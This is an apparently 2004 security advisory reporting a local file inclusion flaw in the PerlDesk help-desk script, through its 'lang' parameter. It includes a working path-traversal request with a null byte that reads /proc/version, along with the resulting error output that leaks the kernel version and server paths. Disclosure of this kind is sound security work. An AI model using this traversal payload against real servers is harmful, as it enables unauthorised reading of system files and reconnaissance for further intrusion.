Posible Inclusion File in Perl Desk
Posible Inclusion File in Perl Desk
0000-0002 Adv-Nkxtox
[Date] 12/09/04
[Author] Nikyt0x nikyt0x[at]hotmail[dot]com
[Site] Http://nikyt0x.webcindario.com
[Information]
PerlDesk is a feature packed web based help desk and email management
application designed
to streamline the operation of managing emails or support requests, with built
in tracking
and response logging it is an ideal help desk solution for companies with one
or more members
of staff or for those who want to organise client support.
[Bug]
Bug is in Inclusion in lang.
Http://server/cgi-bin/pdesk.cgi?lang=h4x0rs%20Rul3z
Can't locate include/lang/h4x0rs Rul3z.inc in @INC (@INC contains: include/mods
/etc/perl /usr/lib/perl5/site_perl/5.8.0/i686-linux
/usr/lib/perl5/site_perl/5.8.0 /usr/lib/perl5/site_perl
/usr/lib/perl5/vendor_perl/5.8.0/i686-linux /usr/lib/perl5/vendor_perl/5.8.0
/usr/lib/perl5/vendor_perl /usr/lib/perl5/5.8.0/i686-linux /usr/lib/perl5/5.8.0
/usr/local/lib/site_perl .) at /home/httpd/html/***.****.***/cgi-bin/pdesk.cgi
line 56.
But if you use: pdesk.cgi?lang=[file]%00 :
Http://server/cgi-bin/pdesk.cgi?lang=../../../../../../../proc/version%00
syntax error at include/lang/../../../../../../../proc/version line 1, near
"2.4.21 (" Compilation failed in require at
/home/httpd/html/***.****.***/cgi-bin/pdesk.cgi line 56.
If you read error, you can see Version of Kernel "2.4.21".
...I love this game...